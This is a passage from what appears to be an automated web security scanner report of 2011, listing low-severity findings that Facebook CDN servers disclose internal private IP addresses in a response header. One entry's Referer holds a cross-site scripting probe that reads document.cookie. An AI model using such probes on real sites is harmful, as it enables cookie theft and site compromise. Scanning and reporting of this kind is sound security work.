......JFIF.....d.d......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

22.4. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.185.103

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=8acaaad959502459e4543d0d4c3f4be4&src=http%3A%2F%2Fwww.primescratchcards.com%2Fimages%2Finvite.png HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/png
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.136.185.103
X-Cnection: close
Content-Length: 20907
Cache-Control: public, max-age=31535945
Expires: Tue, 15 May 2012 12:44:09 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close

.PNG
.
...IHDR.......t......j.|..
.iCCPicm..x..VgTS..=...BK@:...K...D.tQ I.P...P.#*8....".....J.AED.
.T. 2......w#?t.[..z..:..........8...$@..#C ...y2bb......j@...-6''..7.......[L.l...q....|.O^..
...[SNIP]...

22.5. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.160.117

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=d8ff8d31efdfc563e51ce186f7f6d46e&src=http%3A%2F%2Fcreative.primegaming.com%2FGeneral%2FPSC_EN_GBP_0_500x380_252-new-facebook.gif HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/gif
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.136.160.117
X-Cnection: close
Content-Length: 58345
Cache-Control: public, max-age=31535942
Expires: Tue, 15 May 2012 12:44:06 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close

GIF89a..|..$........................................ES7......vyx.E(......EVEerV696...ehf$'#&1c......9E7VYVDGC...WgW..x..........!.......(1%"...f.ewf.........k.X{.z...;PB......I|......jJb8..vo.v...UgH]
...[SNIP]...

22.6. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.196.120

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=906420395ace61b9dc37dbaf39ef3b3c&src=http%3A%2F%2Fwww.primescratchcards.com%2Fbanners%2Fargos%2F260x100.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.136.196.120
X-Cnection: close
Content-Length: 20212
Cache-Control: public, max-age=31536000
Expires: Tue, 15 May 2012 12:45:04 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close

......JFIF.....H.H......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

22.7. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.195.102

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=ba483d359d51fe4d9b0e62eaebeb10c2&src=http%3A%2F%2Fwww.primescratchcards.com%2Fimages%2Fpearl.png HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/png
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.32.195.102
X-Cnection: close
Content-Length: 32562
Cache-Control: public, max-age=31536000
Expires: Tue, 15 May 2012 12:45:04 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close

.PNG
.
...IHDR.......t......j.|..
.iCCPicm..x..VgTS..=...BK@:...K...D.tQ I.P...P.#*8....".....J.AED.
.T. 2......w#?t.[..z..:..........8...$@..#C ...y2bb......j@...-6''..7.......[L.l...q....|.O^..
...[SNIP]...

22.8. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.199

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1408
Expires: Mon, 16 May 2011 13:13:12 GMT
Date: Mon, 16 May 2011 12:49:44 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

22.9. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y-/r/R9NKeEUZ860.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.189

Request

GET /rsrc.php/v1/y-/r/R9NKeEUZ860.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 12 May 2011 21:59:55 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31224016
Expires: Fri, 11 May 2012 22:05:16 GMT
Date: Mon, 16 May 2011 12:45:00 GMT
Connection: close
Content-Length: 33128

/*1305238021,169776317*/

.DOMControl_placeholder{color:#777}
.no_js .DOMControl_placeholder{color:#000}
.DOMControl_shadow{left:-10000px;position:absolute;top:-10000px;white-space:pre-wrap}
body{back
...[SNIP]...

22.10. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/29zADtiP5cm.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yC/r/29zADtiP5cm.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.185

Request

GET /rsrc.php/v1/yC/r/29zADtiP5cm.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 03 May 2011 19:11:00 GMT
X-FB-Server: 10.138.64.185
Vary: Accept-Encoding
Cache-Control: public, max-age=31224079
Expires: Fri, 11 May 2012 22:06:19 GMT
Date: Mon, 16 May 2011 12:45:00 GMT
Connection: close
Content-Length: 603

/*1305238022,176832697*/

.sp_9rjvzf{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z2/r/lQnr2lay0rR.png);background-repeat:no-repeat;display:inline-block;height:90px;width:190px}
.sx_902
...[SNIP]...

22.11. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/6Lsyu5J6BKV.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yC/r/6Lsyu5J6BKV.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /rsrc.php/v1/yC/r/6Lsyu5J6BKV.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 12 May 2011 22:00:25 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31224143
Expires: Fri, 11 May 2012 22:07:23 GMT
Date: Mon, 16 May 2011 12:45:00 GMT
Connection: close
Content-Length: 22318

/*1305238023,169776066*/

button.async_saving .default_message,
a.async_saving .default_message,
form.async_saving .default_message,
.saving_message{display:none}
.default_message,
button.async_saving
...[SNIP]...

22.12. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/13eVoEevxOb.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yG/r/13eVoEevxOb.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.197

Request

GET /rsrc.php/v1/yG/r/13eVoEevxOb.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 09 May 2011 02:24:11 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30894647
Expires: Tue, 08 May 2012 02:35:47 GMT
Date: Mon, 16 May 2011 12:45:00 GMT
Connection: close
Content-Length: 14206

/*1304908668,169775813*/

#captcha fieldset{border-top:1px solid #c0c0c0;border-bottom:1px solid #c0c0c0;margin:0;padding:10px}
#captcha legend{color:#808080}
#captcha .divider{display:none}
#captcha
...[SNIP]...

22.13. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/KI-TuOEwsYB.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yL/r/KI-TuOEwsYB.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.195

Request

GET /rsrc.php/v1/yL/r/KI-TuOEwsYB.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc208483563d2%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 18 Apr 2011 03:19:40 GMT
X-FB-Server: 10.30.146.195
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=29137202
Expires: Tue, 17 Apr 2012 18:32:13 GMT
Date: Mon, 16 May 2011 12:52:11 GMT
Connection: close
Content-Length: 5615

/*1303151604,169775811*/

if (window.CavalryLogger) { CavalryLogger.start_js(["JRfiS"]); }

var XD={_callbacks:[],_opts:{autoResize:false,allowShrink:true,channelUrl:null,hideOverflow:false,newResizeM
...[SNIP]...

22.14. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Gny22VYkiF8.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yT/r/Gny22VYkiF8.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.192

Request

GET /rsrc.php/v1/yT/r/Gny22VYkiF8.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 03 May 2011 19:11:00 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30896222
Expires: Tue, 08 May 2012 03:02:03 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 464

/*1304910165,169776320*/

.sp_bxn2lv{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/3CROxDf49ph.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_394e
...[SNIP]...

22.15. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/qCyv4dtIhXX.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yW/r/qCyv4dtIhXX.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.190

Request

GET /rsrc.php/v1/yW/r/qCyv4dtIhXX.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 03 May 2011 19:11:00 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31224000
Expires: Fri, 11 May 2012 22:05:01 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 749

/*1305238020,169776318*/

.sp_2bj2fu{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zC/r/5b5JL166gaA.png);background-repeat:no-repeat;display:inline-block;height:14px;width:11px}
.sx_7c27
...[SNIP]...

22.16. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/cw0X-OuHro4.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yX/r/cw0X-OuHro4.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.185

Request

GET /rsrc.php/v1/yX/r/cw0X-OuHro4.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 03 May 2011 19:11:00 GMT
X-FB-Server: 10.138.69.185
Vary: Accept-Encoding
Cache-Control: public, max-age=31224142
Expires: Fri, 11 May 2012 22:07:23 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 325

/*1305238024,176833977*/

.sp_35c3go{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png);background-repeat:no-repeat;display:inline-block;height:10px;width:13px}
.sx_0ae9
...[SNIP]...

22.17. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/pnnjl6ACZdc.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yZ/r/pnnjl6ACZdc.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.185

Request

GET /rsrc.php/v1/yZ/r/pnnjl6ACZdc.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 25 Feb 2010 14:35:38 -0800
X-Powered-By: HPHP
X-FB-Server: 10.138.69.185
Vary: Accept-Encoding
Cache-Control: public, max-age=24659496
Expires: Sat, 25 Feb 2012 22:36:38 GMT
Date: Mon, 16 May 2011 12:45:02 GMT
Connection: close
Content-Length: 261

/*1298673338,176833977*/

.profile-platform-pane{overflow:hidden;padding-right:0;position:relative;width:520px}
.profile-platform-pane pane-content{overflow:hidden}
.profile .app_tab{position:relative
...[SNIP]...

22.18. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/zu6qmwS44NI.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yd/r/zu6qmwS44NI.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.183

Request

GET /rsrc.php/v1/yd/r/zu6qmwS44NI.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 03 May 2011 19:11:00 GMT
X-FB-Server: 10.138.17.183
Vary: Accept-Encoding
Cache-Control: public, max-age=31224139
Expires: Fri, 11 May 2012 22:07:20 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 719

/*1305238023,176820663*/

.sp_8begw1{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z5/r/55ZG1uMFCrx.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_2ef4
...[SNIP]...

22.19. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/JpK09bsayNa.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yi/r/JpK09bsayNa.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.189

Request

GET /rsrc.php/v1/yi/r/JpK09bsayNa.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 12 May 2011 21:56:54 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31224116
Expires: Fri, 11 May 2012 22:07:00 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close
Content-Length: 102365

/*1305238022,169776317*/

if (window.CavalryLogger) { CavalryLogger.start_js(["D\/yBL"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string
...[SNIP]...

22.20. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vGrfOJHPJkR.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yi/r/vGrfOJHPJkR.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.195

Request

GET /rsrc.php/v1/yi/r/vGrfOJHPJkR.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 09 May 2011 02:24:38 GMT
X-FB-Server: 10.30.145.195
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30895780
Expires: Tue, 08 May 2012 02:54:41 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 1031

/*1304909649,169775555*/

#wall_section_header .uiSelectorButton,#wall_section_header .uiSelectorButton:active,#wall_section_header .uiSelectorButton:focus,#wall_section_header .uiSelectorButton:hover
...[SNIP]...

22.21. http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/dDcIjg2q0Sp.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yq/r/dDcIjg2q0Sp.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

GET /rsrc.php/v1/yq/r/dDcIjg2q0Sp.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc208483563d2%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 11 May 2011 05:30:31 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31096283
Expires: Thu, 10 May 2012 10:43:32 GMT
Date: Mon, 16 May 2011 12:52:09 GMT
Connection: close
Content-Length: 26450

/*1305110529,169776067*/

body.fan_widget{background:transparent}
.fbDarkWidget .fan_box{color:#808080}
.fbDarkWidget .fan_box a{color:#ccc}
.fan_box .full_widget{border:solid 1px #94a3c4;background:w
...[SNIP]...

22.22. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ApyVrGzMbqQ.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yv/r/ApyVrGzMbqQ.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.185

Request

GET /rsrc.php/v1/yv/r/ApyVrGzMbqQ.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 12 May 2011 21:57:34 GMT
X-FB-Server: 10.138.16.185
Vary: Accept-Encoding
Cache-Control: public, max-age=31224096
Expires: Fri, 11 May 2012 22:06:40 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close
Content-Length: 132054

/*1305238016,176820409*/

if (window.CavalryLogger) { CavalryLogger.start_js(["DfLLX"]); }

var DOMScroll={getScrollState:function(){var d=Vector2.getViewportDimensions();var a=Vector2.getDocumentDime
...[SNIP]...

22.23. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/L-db0ALpEr8.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yx/r/L-db0ALpEr8.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.186

Request

GET /rsrc.php/v1/yx/r/L-db0ALpEr8.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc208483563d2%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 10 May 2011 05:43:30 GMT
X-FB-Server: 10.138.17.186
